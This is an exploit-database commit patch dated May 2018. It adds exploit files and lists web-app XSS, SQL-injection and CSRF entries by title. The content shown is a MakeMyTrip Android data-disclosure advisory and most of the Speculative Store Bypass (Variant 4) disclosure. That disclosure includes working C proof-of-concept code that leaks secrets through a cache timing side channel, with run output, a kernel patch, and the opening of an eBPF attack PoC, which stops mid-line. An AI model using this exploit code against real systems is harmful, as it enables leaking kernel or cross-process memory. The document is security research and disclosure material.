From 7bbc3238546c7b84f4403336b75c5b2779e20628 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Wed, 23 May 2018 05:01:45 +0000 Subject: [PATCH] DB: 2018-05-23 20 changes to exploits/shellcodes Siemens SIMATIC S7-1500 CPU - Remote Denial of Service Microsoft Edge Chakra JIT - Magic Value Type Confusion AMD / ARM / Intel - Speculative Execution Variant 4 Speculative Store Bypass Dell EMC RecoverPoint boxmgmt CLI < 5.1.2 - Arbitrary File Read MakeMyTrip 7.2.4 - Information Disclosure Linux 4.4.0 < 4.4.0-53 - AF_PACKET chocobo_root Privilege Escalation (Metasploit) Microsoft Windows - 'POP/MOV SS' Privilege Escalation Multiplayer BlackJack Online Casino Game 2.5 - Persistent Cross-Site Scripting Multiplayer BlackJack Online Casino Game 2.5 - Cross-Site Scripting Zechat 1.5 - SQL Injection / Cross-Site Request Forgery Healwire Online Pharmacy 3.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery Healwire Online Pharmacy 3.0 - Cross-Site Scripting / Cross-Site Request Forgery Private Message PHP Script 2.0 - Persistent Cross-Site Scripting Flippy DamnFacts - Viral Fun Facts Sharing Script 1.1.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery Private Message PHP Script 2.0 - Cross-Site Scripting Flippy DamnFacts - Viral Fun Facts Sharing Script 1.1.0 - Cross-Site Scripting / Cross-Site Request Forgery ManageEngine Recovery Manager Plus 5.3 - Persistent Cross-Site Scripting ManageEngine Recovery Manager Plus 5.3 - Cross-Site Scripting Auto Dealership & Vehicle Showroom WebSys 1.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery / Admin Panel Authentication Bypass Auto Dealership & Vehicle Showroom WebSys 1.0 - Multiple Vulnerabilities Model Agency Media House & Model Gallery 1.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery / Authentication Bypass Wchat PHP AJAX Chat Script 1.5 - Persistent Cross-Site Scripting Model Agency Media House & Model Gallery 1.0 - Multiple Vulnerabilities Wchat PHP AJAX Chat Script 1.5 - Cross-Site Scripting Nordex N149/4.0-4.5 - SQL Injection WebSocket Live Chat - Cross-Site Scripting Siemens SIMATIC S7-1200 CPU - Cross-Site Scripting PaulPrinting CMS Printing 1.0 - SQL Injection iSocial 1.2.0 - Cross-Site Scripting / Cross-Site Request Forgery ERPnext 11 - Cross-Site Scripting NewsBee CMS 1.4 - 'home-text-edit.php' SQL Injection Auto Car 1.2 - 'car_title' SQL Injection / Cross-Site Scripting NewsBee CMS 1.4 - 'home-text-edit.php' SQL Injection Feedy RSS News Ticker 2.0 - 'cat' SQL Injection NewsBee CMS 1.4 - 'download.php' SQL Injection Easy File Uploader 1.7 - SQL Injection / Cross-Site Scripting --- exploits/android/local/44690.txt | 24 + exploits/hardware/dos/44695.c | 994 ++++++++++++++++++++++++++++ exploits/hardware/webapps/44684.txt | 48 ++ exploits/java/webapps/44691.txt | 17 + exploits/linux/dos/44693.py | 18 + exploits/linux/local/44688.txt | 30 + exploits/linux/local/44696.rb | 200 ++++++ exploits/linux/webapps/44687.txt | 12 + exploits/linux/webapps/44698.txt | 39 ++ exploits/php/webapps/44685.txt | 87 +++ exploits/php/webapps/44686.txt | 10 + exploits/php/webapps/44689.txt | 27 + exploits/php/webapps/44692.txt | 51 ++ exploits/php/webapps/44699.txt | 54 ++ exploits/php/webapps/44700.txt | 39 ++ exploits/php/webapps/44701.txt | 22 + exploits/php/webapps/44702.txt | 62 ++ exploits/php/webapps/44703.txt | 48 ++ exploits/windows/dos/44694.js | 33 + exploits/windows/local/44697.txt | 7 + files_exploits.csv | 36 +- 21 files changed, 1850 insertions(+), 8 deletions(-) create mode 100644 exploits/android/local/44690.txt create mode 100644 exploits/hardware/dos/44695.c create mode 100644 exploits/hardware/webapps/44684.txt create mode 100644 exploits/java/webapps/44691.txt create mode 100755 exploits/linux/dos/44693.py create mode 100644 exploits/linux/local/44688.txt create mode 100755 exploits/linux/local/44696.rb create mode 100644 exploits/linux/webapps/44687.txt create mode 100644 exploits/linux/webapps/44698.txt create mode 100644 exploits/php/webapps/44685.txt create mode 100644 exploits/php/webapps/44686.txt create mode 100644 exploits/php/webapps/44689.txt create mode 100644 exploits/php/webapps/44692.txt create mode 100644 exploits/php/webapps/44699.txt create mode 100644 exploits/php/webapps/44700.txt create mode 100644 exploits/php/webapps/44701.txt create mode 100644 exploits/php/webapps/44702.txt create mode 100644 exploits/php/webapps/44703.txt create mode 100644 exploits/windows/dos/44694.js create mode 100644 exploits/windows/local/44697.txt diff --git a/exploits/android/local/44690.txt b/exploits/android/local/44690.txt new file mode 100644 index 000000000..2af729fb3 --- /dev/null +++ b/exploits/android/local/44690.txt @@ -0,0 +1,24 @@ +# Exploit Title: Android Application MakeMyTrip 7.2.4 - Unencrypted Database Files +# Date: 2018-05-21 +# Software Link: MakeMyTrip v7.2.4 Android Application +# Exploit Author: Divya Jain +# Version: 7.2.4 Android App +# CVE: CVE-2018-11242 +# Category: Mobileapps +# Tested on: Android v5.1 + +# 1. Description +# Android application folder was found to contain SQLite database files in the following subdirectory +# data/com.makemytrip/Cache and data/com.makemytrip/databses. This directory is used to store the application’s databases. +# The confidential information can be retrieved from the SQLite databases and stored in cleartext. +# As an impact it is known to affect confidentiality, integrity, and availability. + +# 2. Proof-of-Concept +# The successful exploitation needs a single authentication and filesystem can be accessed, after rooting an android device. +# After accessing the directories below + +/data/com.makemytrip/databases/ +/data/com.makemytrip/cache/ + +# Above directories can be seen with unencrypted version of database files stored in the device +# which can further lead to sensitive information disclosure. \ No newline at end of file diff --git a/exploits/hardware/dos/44695.c b/exploits/hardware/dos/44695.c new file mode 100644 index 000000000..a0eb96766 --- /dev/null +++ b/exploits/hardware/dos/44695.c @@ -0,0 +1,994 @@ +/* +======== Intro / Overview ======== +After Michael Schwarz made some interesting observations, we started +looking into variants other than the three already-known ones. + +I noticed that Intel's Optimization Manual says in +section 2.4.4.5 ("Memory Disambiguation"): + + A load instruction micro-op may depend on a preceding store. Many + microarchitectures block loads until all preceding store address + are known. + The memory disambiguator predicts which loads will not depend on + any previous stores. When the disambiguator predicts that a load + does not have such a dependency, the load takes its data from the + L1 data cache. + Eventually, the prediction is verified. If an actual conflict is + detected, the load and all succeeding instructions are re-executed. + +According to my experiments, this effect can be used to cause +speculative execution to continue far enough to execute a +Spectre-style gadget on a pointer read from a memory slot to which a +store has been speculatively ignored. I have tested this behavior on +the following processors from Intel and AMD: + + - Intel(R) Core(TM) i7-6600U CPU @ 2.60GHz [Skylake laptop] + - AMD PRO A8-9600 R7, 10 COMPUTE CORES 4C+6G [AMD desktop] + - Intel(R) Xeon(R) CPU E5-1650 v3 @ 3.50GHz [Haswell desktop] + +I haven't yet tested this on any ARM CPU. + +Interestingly, only on the Skylake laptop, it seems to work when +interrupts and SMP are disabled while the test is running; on the +other machines, it seems to only work when interrupts are enabled, +maybe because the kernel code cause some noise that garbles some +predictor state or so? Or just because they mess up timing +somewhere... + + +There were mentions of data speculation on the netdev list, in a +somewhat different context: + +https://www.mail-archive.com/netdev@vger.kernel.org/msg212262.html +https://www.mail-archive.com/netdev@vger.kernel.org/msg215369.html + +However, I'm not entirely sure about the terminology. Do +"data speculation" and "value speculation" include speculating about +the *source* of data, or do they refer exclusively to directly +speculating about the *value* of data? + + + + + +======== Demo code (no privilege boundaries crossed) ======== +This is some code that purely demonstrates the basic effect and shows +that it is possible to combine it with a Meltdown/Spectre-style +gadget for leaking data into the cache. It does not cross any +privilege boundaries. + +----------------------- START ----------------------- +// compile with: gcc -o test test.c -Wall -DHIT_THRESHOLD={CYCLES} +// optionally add: -DNO_INTERRUPTS + +#include +#include +#include +#include + +#define pipeline_flush() asm volatile("mov $0, +%%eax\n\tcpuid\n\tlfence" : /*out*/ : /*in*/ : +"rax","rbx","rcx","rdx","memory") +#define clflush(addr) asm volatile("clflush (%0)"::"r"(addr):"memory") + +// source of high-latency pointer to the memory slot +unsigned char **flushy_area[1000]; +#define flushy (flushy_area+500) + +// memory slot on which we want bad memory disambiguation +unsigned char *memory_slot_area[1000]; +#define memory_slot (memory_slot_area+500) + +// 0123456789abcdef +unsigned char secret_read_area[] = "0000011011101011"; +unsigned char public_read_area[] = "################"; + +unsigned char timey_line_area[0x200000]; +// stored in the memory slot first +#define timey_lines (timey_line_area + 0x10000) + +unsigned char dummy_char_sink; + +int testfun(int idx) { + pipeline_flush(); + *flushy = memory_slot; + *memory_slot = secret_read_area; + timey_lines['0' << 12] = 1; + timey_lines['1' << 12] = 1; + pipeline_flush(); + clflush(flushy); + clflush(&timey_lines['0' << 12]); + clflush(&timey_lines['1' << 12]); + asm volatile("mfence"); + pipeline_flush(); + + // START OF CRITICAL PATH + unsigned char **memory_slot__slowptr = *flushy; + //pipeline_flush(); + // the following store will be speculatively ignored since its +address is unknown + *memory_slot__slowptr = public_read_area; + // uncomment the instructions in the next line to break the attack + asm volatile("" /*"mov $0, %%eax\n\tcpuid\n\tlfence"*/ : /*out*/ : +/*in*/ : "rax","rbx","rcx","rdx","memory"); + // architectual read from dummy_timey_line, possible +microarchitectural read from timey_line + dummy_char_sink = timey_lines[(*memory_slot)[idx] << 12]; + // END OF CRITICAL PATH + + unsigned int t1, t2; + + pipeline_flush(); + asm volatile( + "lfence\n\t" + "rdtscp\n\t" + "mov %%eax, %%ebx\n\t" + "mov (%%rdi), %%r11\n\t" + "rdtscp\n\t" + "lfence\n\t" + ://out + "=a"(t2), + "=b"(t1) + ://in + "D"(timey_lines + 0x1000 * '0') + ://clobber + "r11", + "rcx", + "rdx", + "memory" + ); + pipeline_flush(); + unsigned int delay_0 = t2 - t1; + + pipeline_flush(); + asm volatile( + "lfence\n\t" + "rdtscp\n\t" + "mov %%eax, %%ebx\n\t" + "mov (%%rdi), %%r11\n\t" + "rdtscp\n\t" + "lfence\n\t" + ://out + "=a"(t2), + "=b"(t1) + ://in + "D"(timey_lines + 0x1000 * '1') + ://clobber + "r11", + "rcx", + "rdx", + "memory" + ); + pipeline_flush(); + unsigned int delay_1 = t2 - t1; + + if (delay_0 < HIT_THRESHOLD && delay_1 > HIT_THRESHOLD) { + pipeline_flush(); + return 0; + } + if (delay_0 > HIT_THRESHOLD && delay_1 < HIT_THRESHOLD) { + pipeline_flush(); + return 1; + } + pipeline_flush(); + return -1; +} + +int main(void) { + char out[100000]; + char *out_ = out; + +#ifdef NO_INTERRUPTS + if (mlockall(MCL_CURRENT|MCL_FUTURE) || iopl(3)) + err(1, "iopl(3)"); +#endif + + for (int idx = 0; idx < 16; idx++) { +#ifdef NO_INTERRUPTS + asm volatile("cli"); +#endif + pipeline_flush(); + long cycles = 0; + int hits = 0; + char results[33] = {0}; + /* if we don't break the loop after some time when it doesn't +work, in NO_INTERRUPTS mode with SMP disabled, the machine will lock +up */ + while (hits < 32 && cycles < 1000000) { + pipeline_flush(); + int res = testfun(idx); + if (res != -1) { + pipeline_flush(); + results[hits] = res + '0'; + hits++; + } + cycles++; + pipeline_flush(); + } + pipeline_flush(); +#ifdef NO_INTERRUPTS + asm volatile("sti"); +#endif + out_ += sprintf(out_, "%c: %s in %ld cycles (hitrate: %f%%)\n", +secret_read_area[idx], results, cycles, 100*hits/(double)cycles); + } + printf("%s", out); + pipeline_flush(); +} +----------------------- END ----------------------- + + +Results: + +In the following, "SMP off" means that I have executed this +command: +# for file in /sys/devices/system/cpu/cpu*/online; do echo 0 > $file; done + +For the Intel machines, "turbo off" means that I've executed the +following command: +# echo 1 > /sys/devices/system/cpu/intel_pstate/no_turbo + +Skylake laptop, normal: + +$ gcc -o test test.c -Wall -DHIT_THRESHOLD=50 +$ ./test +0: 00000000000000000000000000000000 in 61944 cycles (hitrate: 0.051660%) +0: 00000000000000000000000000000000 in 36467 cycles (hitrate: 0.087751%) +0: 00000000000000000000000000000000 in 36788 cycles (hitrate: 0.086985%) +0: 00000000000000000000000000000000 in 36800 cycles (hitrate: 0.086957%) +0: 00000000000000000000000000000000 in 35797 cycles (hitrate: 0.089393%) +1: 11111111111111111111111111111111 in 48923 cycles (hitrate: 0.065409%) +1: 11111111111111111111111111111111 in 44525 cycles (hitrate: 0.071870%) +0: 00000000000000000000000000000000 in 44813 cycles (hitrate: 0.071408%) +1: 11111111111111111111111111111111 in 40625 cycles (hitrate: 0.078769%) +1: 11111111111111111111111111111111 in 40897 cycles (hitrate: 0.078245%) +1: 11111111111111111111111111111111 in 39648 cycles (hitrate: 0.080710%) +0: 00000000000000000000000000000000 in 40737 cycles (hitrate: 0.078553%) +1: 11111111111111111111111111111111 in 37850 cycles (hitrate: 0.084544%) +0: 00000000000000000000000000000000 in 46062 cycles (hitrate: 0.069472%) +1: 11111111111111111111111111111111 in 44929 cycles (hitrate: 0.071223%) +1: 11111111111111111111111111111111 in 37465 cycles (hitrate: 0.085413%) + +Skylake laptop, SMP off, interrupts off, turbo off: + +$ gcc -o test test.c -Wall -DHIT_THRESHOLD=50 -DNO_INTERRUPTS +$ sudo ./test +0: 00000000000000000000000000000000 in 34697 cycles (hitrate: 0.092227%) +0: 00000000000000000000000000000000 in 32625 cycles (hitrate: 0.098084%) +0: 00000000000000000000000000000000 in 32776 cycles (hitrate: 0.097632%) +0: 00000000000000000000000000000000 in 34680 cycles (hitrate: 0.092272%) +0: 00000000000000000000000000000000 in 32302 cycles (hitrate: 0.099065%) +1: 11111111111111111111111111111111 in 33240 cycles (hitrate: 0.096270%) +1: 11111111111111111111111111111111 in 33738 cycles (hitrate: 0.094849%) +0: 00000000000000000000000000000000 in 31745 cycles (hitrate: 0.100803%) +1: 11111111111111111111111111111111 in 31745 cycles (hitrate: 0.100803%) +1: 11111111111111111111111111111111 in 32531 cycles (hitrate: 0.098368%) +1: 11111111111111111111111111111111 in 31745 cycles (hitrate: 0.100803%) +0: 00000000000000000000000000000000 in 31745 cycles (hitrate: 0.100803%) +1: 11111111111111111111111111111111 in 31745 cycles (hitrate: 0.100803%) +0: 00000000000000000000000000000000 in 32193 cycles (hitrate: 0.099400%) +1: 11111111111111111111111111111111 in 32167 cycles (hitrate: 0.099481%) +1: 11111111111111111111111111111111 in 31745 cycles (hitrate: 0.100803%) + +Haswell PC, normal: + +$ gcc -o test test.c -Wall -DHIT_THRESHOLD=50 +$ ./test +0: 00000000000000000000000000000000 in 119737 cycles (hitrate: 0.026725%) +0: 00000000000000000000000000000000 in 45340 cycles (hitrate: 0.070578%) +0: 00000000000000000000000000000000 in 39127 cycles (hitrate: 0.081785%) +0: 00000000000000000000000000000000 in 39567 cycles (hitrate: 0.080875%) +0: 00000000000000000000000000000000 in 35164 cycles (hitrate: 0.091002%) +1: 11111111111111111111111111111111 in 33770 cycles (hitrate: 0.094759%) +1: 11111111111111111111111111111111 in 36743 cycles (hitrate: 0.087091%) +0: 00000000000000000000000000000000 in 36749 cycles (hitrate: 0.087077%) +1: 11111111111111111111111111111111 in 35686 cycles (hitrate: 0.089671%) +1: 11111111111111111111111111111111 in 35843 cycles (hitrate: 0.089278%) +1: 11111111111111111111111111111111 in 35826 cycles (hitrate: 0.089321%) +0: 00000000000000000000000000000000 in 35302 cycles (hitrate: 0.090646%) +1: 11111111111111111111111111111111 in 34256 cycles (hitrate: 0.093414%) +0: 00000000000000000000000000000000 in 36604 cycles (hitrate: 0.087422%) +1: 11111111111111111111111111111111 in 36795 cycles (hitrate: 0.086968%) +1: 11111111111111111111111111111111 in 37820 cycles (hitrate: 0.084611%) + +Haswell PC, SMP off, interrupts off, turbo off: + +$ gcc -o test test.c -Wall -DHIT_THRESHOLD=50 -DNO_INTERRUPTS +$ sudo ./test +0: 00000000000000000000000000000000 in 32770 cycles (hitrate: 0.097650%) +0: 00000000000000000000000000000000 in 32776 cycles (hitrate: 0.097632%) +0: 00000000000000000000000000000000 in 32783 cycles (hitrate: 0.097612%) +0: 00000000000000000000000000000000 in 31745 cycles (hitrate: 0.100803%) +0: 00000000000000000000000000000000 in 37455 cycles (hitrate: 0.085436%) +1: in 1000000 cycles (hitrate: 0.000000%) +1: in 1000000 cycles (hitrate: 0.000000%) +0: 00000000000000000000000000000000 in 39894 cycles (hitrate: 0.080213%) +1: in 1000000 cycles (hitrate: 0.000000%) +1: in 1000000 cycles (hitrate: 0.000000%) +1: 11111111111111111111111111111111 in 33845 cycles (hitrate: 0.094549%) +0: in 1000000 cycles (hitrate: 0.000000%) +1: in 1000000 cycles (hitrate: 0.000000%) +0: 00000000000000000000000000000000 in 44050 cycles (hitrate: 0.072645%) +1: in 1000000 cycles (hitrate: 0.000000%) +1: in 1000000 cycles (hitrate: 0.000000%) + +AMD desktop, normal: + +$ gcc -o test test.c -Wall -DHIT_THRESHOLD=200 -std=gnu99 +$ ./test +0: 0000000000000000000000000 in 1000000 cycles (hitrate: 0.002500%) +0: 000000000000000000000 in 1000000 cycles (hitrate: 0.002100%) +0: 00000000000000000000000000000000 in 939816 cycles (hitrate: 0.003405%) +0: 00000000000000000000000000000000 in 903838 cycles (hitrate: 0.003540%) +0: 00000000000000000000000000000000 in 360430 cycles (hitrate: 0.008878%) +1: 11111111111111111111111111111111 in 484242 cycles (hitrate: 0.006608%) +1: 11111111111111111111111111111111 in 331271 cycles (hitrate: 0.009660%) +0: 00000000000000000000000000000000 in 388049 cycles (hitrate: 0.008246%) +1: 11111111111111111111111111111111 in 282588 cycles (hitrate: 0.011324%) +1: 11111111111111111111111111111111 in 359558 cycles (hitrate: 0.008900%) +1: 11111111111111111111111111111111 in 359013 cycles (hitrate: 0.008913%) +0: 0000000000000000000000000000000 in 1000000 cycles (hitrate: 0.003100%) +1: 11111111111111111111111111111111 in 501067 cycles (hitrate: 0.006386%) +0: 00000000000000000000000000000000 in 312420 cycles (hitrate: 0.010243%) +1: 11111111111111111111111111111111 in 784663 cycles (hitrate: 0.004078%) +1: 11111111111111111111111111111111 in 954189 cycles (hitrate: 0.003354%) + +AMD desktop, SMP off, interrupts off: + +$ gcc -o test test.c -Wall -DHIT_THRESHOLD=200 -std=gnu99 -DNO_INTERRUPTS +$ sudo ./test +0: 00 in 1000000 cycles (hitrate: 0.000200%) +0: 00 in 1000000 cycles (hitrate: 0.000200%) +0: 00 in 1000000 cycles (hitrate: 0.000200%) +0: 00 in 1000000 cycles (hitrate: 0.000200%) +0: 00 in 1000000 cycles (hitrate: 0.000200%) +1: 11 in 1000000 cycles (hitrate: 0.000200%) +1: 11 in 1000000 cycles (hitrate: 0.000200%) +0: 00 in 1000000 cycles (hitrate: 0.000200%) +1: 11 in 1000000 cycles (hitrate: 0.000200%) +1: 11 in 1000000 cycles (hitrate: 0.000200%) +1: 11 in 1000000 cycles (hitrate: 0.000200%) +0: 00 in 1000000 cycles (hitrate: 0.000200%) +1: in 1000000 cycles (hitrate: 0.000000%) +0: 00 in 1000000 cycles (hitrate: 0.000200%) +1: 11 in 1000000 cycles (hitrate: 0.000200%) +1: 11 in 1000000 cycles (hitrate: 0.000200%) + + + + + +======== assisted BPF PoC ======== +This is a PoC that demonstrates that this issue can potentially be +used to attack the Linux kernel's BPF subsystem. +This is *NOT* a full exploit against BPF; this is a PoC that requires +kernel patches that permit the PoC to flush kernel memory from inside +BPF and to measure access times to BPF arrays. It seems probable that +these restrictions could be overcome, but my PoC doesn't do that. + +The basic idea here is to cause a speculative type confusion: + +1. Store a number N at address A on the stack. +2. Write a pointer P to address A, using a high-latency + expression to compute A. +3. Read a value X from address A, with A specified using a low-latency + expression. Architecturally, X is P; however, microarchitecturally, + X can be N. +4. Use the Spectre/Meltdown gadget to leak the value X points to into + the cache. + +The attack benefits from the unique property of eBPF that the engine +performs relatively complicated value tracking, but does not +normally use the resulting information to modify the code in any way +(e.g. by optimizing things away). It is not clear how applicable this +attack would be to e.g. other scripting languages, or whether it is an +issue for non-scripting code. + +I have only tested this PoC on an Intel Skylake CPU. + + +Kernel patch required for the PoC to work (copy attached, so that it +applies cleanly), to be applied to the 4.15.1 stable kernel: + +----------------------- START ----------------------- +diff --git a/include/linux/bpf.h b/include/linux/bpf.h +index 0b25cf87b6d6..896b4f483fe2 100644 +--- a/include/linux/bpf.h ++++ b/include/linux/bpf.h +@@ -591,6 +591,7 @@ extern const struct bpf_func_proto bpf_skb_vlan_push_proto; + extern const struct bpf_func_proto bpf_skb_vlan_pop_proto; + extern const struct bpf_func_proto bpf_get_stackid_proto; + extern const struct bpf_func_proto bpf_sock_map_update_proto; ++extern const struct bpf_func_proto bpf_clflush_mfence_proto; + + /* Shared helpers among cBPF and eBPF. */ + void bpf_user_rnd_init_once(void); +diff --git a/kernel/bpf/helpers.c b/kernel/bpf/helpers.c +index 3d24e238221e..379dc888cb81 100644 +--- a/kernel/bpf/helpers.c ++++ b/kernel/bpf/helpers.c +@@ -179,3 +179,17 @@ const struct bpf_func_proto bpf_get_current_comm_proto = { + .arg1_type = ARG_PTR_TO_UNINIT_MEM, + .arg2_type = ARG_CONST_SIZE, + }; ++ ++BPF_CALL_1(bpf_clflush_mfence, void *, target) { ++ asm volatile("mfence\n\tclflush (%0)\n\tmfence"::"r"(target):"memory"); ++ return 0; ++} ++ ++const struct bpf_func_proto bpf_clflush_mfence_proto = { ++ .func = bpf_clflush_mfence, ++ .ret_type = RET_INTEGER, ++ /* theoretically permits CLFLUSH on invalid addresses, ++ * but the PoC doesn't do that ++ */ ++ .arg1_type = ARG_DONTCARE ++}; +diff --git a/kernel/bpf/syscall.c b/kernel/bpf/syscall.c +index 5cb783fc8224..2dd9a2a95630 100644 +--- a/kernel/bpf/syscall.c ++++ b/kernel/bpf/syscall.c +@@ -605,6 +605,85 @@ static int map_lookup_elem(union bpf_attr *attr) + return err; + } + ++static int map_time_flush_loc(union bpf_attr *attr) ++{ ++ void __user *ukey = u64_to_user_ptr(attr->key); ++ void __user *uvalue = u64_to_user_ptr(attr->value); ++ int ufd = attr->map_fd; ++ struct bpf_map *map; ++ void *key, *ptr; ++ struct fd f; ++ int err = 0; ++ u64 delay = 0; ++ ++ f = fdget(ufd); ++ map = __bpf_map_get(f); ++ if (IS_ERR(map)) ++ return PTR_ERR(map); ++ ++ if (!(f.file->f_mode & FMODE_CAN_READ)) { ++ err = -EPERM; ++ goto err_put; ++ } ++ ++ if (map->map_type != BPF_MAP_TYPE_ARRAY) { ++ err = -EINVAL; ++ goto err_put; ++ } ++ ++ if (attr->flags > 0x100000 || attr->flags >= map->value_size) { ++ err = -EINVAL; ++ goto err_put; ++ } ++ asm volatile("lfence"); ++ ++ key = memdup_user(ukey, map->key_size); ++ if (IS_ERR(key)) { ++ err = PTR_ERR(key); ++ goto err_put; ++ } ++ ++ rcu_read_lock(); ++ ptr = map->ops->map_lookup_elem(map, key); ++ if (ptr) { ++ unsigned int t1, t2; ++ ptr = (char*)ptr + attr->flags; ++ asm volatile( ++ "xor %%r11, %%r11\n\t" ++ "lfence\n\t" ++ "rdtscp\n\t" ++ "mov %%eax, %%ebx\n\t" ++ "mov (%%rdi), %%r11b\n\t" ++ "rdtscp\n\t" ++ "mfence\n\t" ++ "clflush (%%rdi)\n\t" ++ "mfence\n\t" ++ ://out ++ "=a"(t2), ++ "=b"(t1) ++ ://in ++ "D"(ptr) ++ ://clobber ++ "r11", ++ "rcx", ++ "rdx", ++ "memory" ++ ); ++ delay = t2 - t1; ++ } ++ rcu_read_unlock(); ++ if (copy_to_user(uvalue, &delay, 8)) { ++ err = -EINVAL; ++ goto free_key; ++ } ++ ++free_key: ++ kfree(key); ++err_put: ++ fdput(f); ++ return err; ++} ++ + #define BPF_MAP_UPDATE_ELEM_LAST_FIELD flags + + static int map_update_elem(union bpf_attr *attr) +@@ -1713,6 +1792,9 @@ SYSCALL_DEFINE3(bpf, int, cmd, union bpf_attr +__user *, uattr, unsigned int, siz + case BPF_MAP_UPDATE_ELEM: + err = map_update_elem(&attr); + break; ++ case 0x13370001: ++ err = map_time_flush_loc(&attr); ++ break; + case BPF_MAP_DELETE_ELEM: + err = map_delete_elem(&attr); + break; +diff --git a/net/core/filter.c b/net/core/filter.c +index 1c0eb436671f..e310a345054c 100644 +--- a/net/core/filter.c ++++ b/net/core/filter.c +@@ -3347,6 +3347,8 @@ bpf_base_func_proto(enum bpf_func_id func_id) + return &bpf_tail_call_proto; + case BPF_FUNC_ktime_get_ns: + return &bpf_ktime_get_ns_proto; ++ case 4: ++ return &bpf_clflush_mfence_proto; + case BPF_FUNC_trace_printk: + if (capable(CAP_SYS_ADMIN)) + return bpf_get_trace_printk_proto(); +----------------------- END ----------------------- + + +The PoC: + +----------------------- START ----------------------- +*/ + +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#define GPLv2 "GPL v2" +#define ARRSIZE(x) (sizeof(x) / sizeof((x)[0])) + + + +/* registers */ +/* caller-saved: r0..r5 */ +#define BPF_REG_ARG1 BPF_REG_1 +#define BPF_REG_ARG2 BPF_REG_2 +#define BPF_REG_ARG3 BPF_REG_3 +#define BPF_REG_ARG4 BPF_REG_4 +#define BPF_REG_ARG5 BPF_REG_5 +#define BPF_REG_CTX BPF_REG_6 +#define BPF_REG_FP BPF_REG_10 + +#define BPF_LD_IMM64_RAW(DST, SRC, IMM) \ + ((struct bpf_insn) { \ + .code = BPF_LD | BPF_DW | BPF_IMM, \ + .dst_reg = DST, \ + .src_reg = SRC, \ + .off = 0, \ + .imm = (__u32) (IMM) }), \ + ((struct bpf_insn) { \ + .code = 0, /* zero is reserved opcode */ \ + .dst_reg = 0, \ + .src_reg = 0, \ + .off = 0, \ + .imm = ((__u64) (IMM)) >> 32 }) +#define BPF_LD_MAP_FD(DST, MAP_FD) \ + BPF_LD_IMM64_RAW(DST, BPF_PSEUDO_MAP_FD, MAP_FD) +#define BPF_LDX_MEM(SIZE, DST, SRC, OFF) \ + ((struct bpf_insn) { \ + .code = BPF_LDX | BPF_SIZE(SIZE) | BPF_MEM,\ + .dst_reg = DST, \ + .src_reg = SRC, \ + .off = OFF, \ + .imm = 0 }) +#define BPF_MOV64_REG(DST, SRC) \ + ((struct bpf_insn) { \ + .code = BPF_ALU64 | BPF_MOV | BPF_X, \ + .dst_reg = DST, \ + .src_reg = SRC, \ + .off = 0, \ + .imm = 0 }) +#define BPF_ALU64_IMM(OP, DST, IMM) \ + ((struct bpf_insn) { \ + .code = BPF_ALU64 | BPF_OP(OP) | BPF_K, \ + .dst_reg = DST, \ + .src_reg = 0, \ + .off = 0, \ + .imm = IMM }) +#define BPF_STX_MEM(SIZE, DST, SRC, OFF) \ + ((struct bpf_insn) { \ + .code = BPF_STX | BPF_SIZE(SIZE) | BPF_MEM,\ + .dst_reg = DST, \ + .src_reg = SRC, \ + .off = OFF, \ + .imm = 0 }) +#define BPF_ST_MEM(SIZE, DST, OFF, IMM) \ + ((struct bpf_insn) { \ + .code = BPF_ST | BPF_SIZE(SIZE) | BPF_MEM, \ + .dst_reg = DST, \ + .src_reg = 0, \ + .off = OFF, \ + .imm = IMM }) +#define BPF_EMIT_CALL(FUNC) \ + ((struct bpf_insn) { \ + .code = BPF_JMP | BPF_CALL, \ + .dst_reg = 0, \ + .src_reg = 0, \ + .off = 0, \ + .imm = (FUNC) }) +#define BPF_JMP_IMM(OP, DST, IMM, OFF) \ + ((struct bpf_insn) { \ + .code = BPF_JMP | BPF_OP(OP) | BPF_K, \ + .dst_reg = DST, \ + .src_reg = 0, \ + .off = OFF, \ + .imm = IMM }) +#define BPF_EXIT_INSN() \ + ((struct bpf_insn) { \ + .code = BPF_JMP | BPF_EXIT, \ + .dst_reg = 0, \ + .src_reg = 0, \ + .off = 0, \ + .imm = 0 }) +#define BPF_LD_ABS(SIZE, IMM) \ + ((struct bpf_insn) { \ + .code = BPF_LD | BPF_SIZE(SIZE) | BPF_ABS, \ + .dst_reg = 0, \ + .src_reg = 0, \ + .off = 0, \ + .imm = IMM }) +#define BPF_ALU64_REG(OP, DST, SRC) \ + ((struct bpf_insn) { \ + .code = BPF_ALU64 | BPF_OP(OP) | BPF_X, \ + .dst_reg = DST, \ + .src_reg = SRC, \ + .off = 0, \ + .imm = 0 }) +#define BPF_MOV64_IMM(DST, IMM) \ + ((struct bpf_insn) { \ + .code = BPF_ALU64 | BPF_MOV | BPF_K, \ + .dst_reg = DST, \ + .src_reg = 0, \ + .off = 0, \ + .imm = IMM }) + + + +int bpf_(int cmd, union bpf_attr *attrs) { + return syscall(__NR_bpf, cmd, attrs, sizeof(*attrs)); +} + +int array_create(int value_size, int num_entries) { + union bpf_attr create_map_attrs = { + .map_type = BPF_MAP_TYPE_ARRAY, + .key_size = 4, + .value_size = value_size, + .max_entries = num_entries + }; + int mapfd = bpf_(BPF_MAP_CREATE, &create_map_attrs); + if (mapfd == -1) + err(1, "map create"); + return mapfd; +} + +unsigned int array_time_flush_loc(int mapfd, uint32_t idx, uint32_t off) { + uint64_t time; + union bpf_attr attr = { + .map_fd = mapfd, + .key = (uint64_t)&idx, + .value = (uint64_t)&time, + .flags = off, + }; + + int res = bpf_(0x13370001, &attr); + if (res) + err(1, "map flush loc"); + return time; +} + +void array_set_dw(int mapfd, uint32_t key, uint64_t value) { + union bpf_attr attr = { + .map_fd = mapfd, + .key = (uint64_t)&key, + .value = (uint64_t)&value, + .flags = BPF_ANY, + }; + + int res = bpf_(BPF_MAP_UPDATE_ELEM, &attr); + if (res) + err(1, "map update elem"); +} + +int prog_load(struct bpf_insn *insns, size_t insns_count) { + char verifier_log[100000]; + union bpf_attr create_prog_attrs = { + .prog_type = BPF_PROG_TYPE_SOCKET_FILTER, + .insn_cnt = insns_count, + .insns = (uint64_t)insns, + .license = (uint64_t)GPLv2, + .log_level = 1, + .log_size = sizeof(verifier_log), + .log_buf = (uint64_t)verifier_log + }; + int progfd = 